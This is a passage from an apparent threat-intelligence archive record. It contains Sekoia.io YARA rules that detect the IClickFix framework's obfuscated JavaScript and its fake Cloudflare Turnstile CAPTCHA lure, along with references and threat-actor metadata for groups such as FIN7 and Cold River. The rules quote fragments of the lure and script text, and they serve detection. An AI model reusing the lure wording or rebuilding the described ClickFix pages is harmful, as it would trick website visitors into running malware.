id=\\\"ic-tracker-js\\\"\" ascii\r\n    condition:\r\n        all of them\r\n}\r\nFirst obfuscated JavaScript of the IClickFix framework:\r\nrule infrastructure_iclickfix_cluster_ic_tracker_js_javascript1 {\r\n    meta:\r\n        description = \"Find the first obfuscated JavaScript of the IClickFix cluster, that contacts the .php?data= URL to\r\n        source = \"Sekoia.io\"\r\n        creation_date = \"2025-12-04\"\r\n        modification_date = \"2025-12-04\"\r\n        classification = \"TLP:CLEAR\"\r\n    strings:\r\n        $obfjs01 = \"'location'\" ascii\r\n        $obfjs02 = \"'style'\" ascii\r\n        $obfjs03 = \"?data=\" ascii\r\n        $obfjs04 = \"={'host'\" ascii\r\n        $obfjs05 = \"animation:1s\\\\x20ease-in-out\\\\x201s\\\\x20forwards\\\\x20fadeIn}',\" ascii\r\n        $obfjs06 = \"}(document,\" ascii\r\n        $obfjs07 = \"'aHR0cH\" ascii\r\n        $obfjs08 = \"'now'\" ascii\r\n    condition:\r\n        6 of ($obfjs0*)\r\n}\r\nSecond obfuscated JavaScript of the IClickFix framework:\r\nrule infrastructure_iclickfix_cluster_ic_tracker_js_javascript2 {\r\n    meta:\r\n        description = \"Find the second JavaScript of the IClickFix cluster, that contacts the .php?page= URL to download t\r\n        source = \"Sekoia.io\"\r\n        creation_date = \"2025-12-04\"\r\n        modification_date = \"2025-12-04\"\r\n        classification = \"TLP:CLEAR\"\r\n    strings:\r\n        $datajs01 = \"xhr.send();\" ascii\r\n        $datajs02 = \".php?page=\\\");\" ascii\r\n        $datajs03 = \"function getFaviconPath() {\" ascii\r\n        $datajs04 = \"close-tlc-data\" ascii\r\n        $datajs05 = \".php?click=1\u0026data=\\\"\" ascii\r\n        $datajs06 = \"// listen from child\" ascii\r\n        $datajs07 = \"--loadNumValue\" ascii\r\n        $datajs08 = \"encodeURIComponent(JSON.stringify(data))\" ascii\r\n        $datajs09 = \"/* WHITE background: rgba(255,255,255,0.65); */\" ascii\r\n    condition:\r\n        6 of ($datajs0*)\r\n}\r\nHTML of the IClickFix lure impersonating the Cloudflare Turnstile CAPTCHA:\r\nrule infrastructure_iclickfix_cluster_ic_tracker_html_lure {\r\n    meta:\r\n        description = \"Find the HTML lure used by the IClickFix cluster, impersonating Cloudflare Turnstile CAPTCHA\"\r\n        source = \"Sekoia.io\"\r\n        creation_date = \"2025-12-04\"\r\n        modification_date = \"2025-12-04\"\r\n        classification = \"TLP:CLEAR\"\r\n    strings:\r\n        // HTML page containing JavaScript and a second HTML corresponding to the ClickFix lure\r\n        $lure01 = \"let clickCopy\" ascii\r\n        $lure02 = \"let clickCounts\" ascii\r\n        $lure03 = \"let delay\" ascii\r\n        $lure04 = \"let COPYbase64Text\" ascii\r\n        $lure05 = \"let rayID\" ascii\r\n        $lure06 = \"'Cloudflare protection – verify with code:\" ascii\r\n        $lure07 = \"center.innerHTML\" ascii\r\n        $lure08 = \"Verify you are human\" ascii\r\n        $lure09 = \"location.host + \" ascii\r\n        $lure10 = \"needs to review the security of your connection before proceeding.\" ascii\r\n        $lure11 = \"Unusual Web Traffic Detected\" ascii\r\n        $lure12 = \"Our security system has identified irregular web activity\" ascii\r\n        $lure13 = \"originating from your IP address. Automated verification\" ascii\r\n        $lure14 = \"unable to confirm that you are a legitimate user.\" ascii\r\n        $lure15 = \"This manual verification step helps us ensure that your connection\" ascii\r\n    condition:\r\n        9 of ($lure*)\r\n}\r\nExternal references\r\n1. [Medium] Bypassing Malicious TDS in ClickFix Campaigns, by Walmart Global Tech Blog\r\n2. [Sekoia.io] ClearFake’s New Widespread Variant: Increased Web3 Exploitation for Malware Delivery\r\n3. [urlquery] About urlquery.net\r\n4. [Share Sekoia.io] Video example of a website compromised by the IClickFix framework\r\n5. [GitHub] YOURLS\r\n6. [urlscan.io] Scan results for hxxps://ksfldfklskdmbxcvb[.]com/admin/\r\n7. [GitHub] YOURLS/includes/functions.php\r\n8. [eSentire] EVALUSION Campaign Delivers Amatera Stealer and NetSupport RAT\r\n9. [WordPress] Elementor Website Builder – WordPress plugin\r\n10. [WordPress] WooCommerce – WordPress plugin\r\n11. [WordPress] Gravity Forms Plugin\r\nSource: https://blog.sekoia.io/meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.sekoia.io/meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic/"
	],
	"report_names": [
		"meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic"
	],
	"threat_actors": [
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2d06d270-acfd-4db8-83a8-4ff68b9b1ada",
			"created_at": "2022-10-25T16:07:23.477794Z",
			"updated_at": "2026-04-10T02:00:04.625004Z",
			"deleted_at": null,
			"main_name": "Cold River",
			"aliases": [
				"Blue Callisto",
				"BlueCharlie",
				"Calisto",
				"Cobalt Edgewater",
				"Gossamer Bear",
				"Grey Pro",
				"IRON FRONTIER",
				"Mythic Ursa",
				"Nahr Elbard",
				"Nahr el bared",
				"Seaborgium",
				"Star Blizzard",
				"TA446",
				"TAG-53",
				"UNC4057"
			],
			"source_name": "ETDA:Cold River",
			"tools": [
				"Agent Drable",
				"AgentDrable",
				"DNSpionage",
				"LOSTKEYS",
				"SPICA"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3a057a97-db21-4261-804b-4b071a03c124",
			"created_at": "2024-06-04T02:03:07.953282Z",
			"updated_at": "2026-04-10T02:00:03.813595Z",
			"deleted_at": null,
			"main_name": "IRON FRONTIER",
			"aliases": [
				"Blue Callisto ",
				"BlueCharlie ",
				"CALISTO ",
				"COLDRIVER ",
				"Callisto Group ",
				"GOSSAMER BEAR ",
				"SEABORGIUM ",
				"Star Blizzard ",
				"TA446 "
			],
			"source_name": "Secureworks:IRON FRONTIER",
			"tools": [
				"Evilginx2",
				"Galileo RCS",
				"SPICA"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434428,
	"ts_updated_at": 1775826786,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/29e31357ae811beabbe597ff82092503a5a73c3e.pdf",
		"text": "https://archive.orkl.eu/29e31357ae811beabbe597ff82092503a5a73c3e.txt",
		"img": "https://archive.orkl.eu/29e31357ae811beabbe597ff82092503a5a73c3e.jpg"
	}
}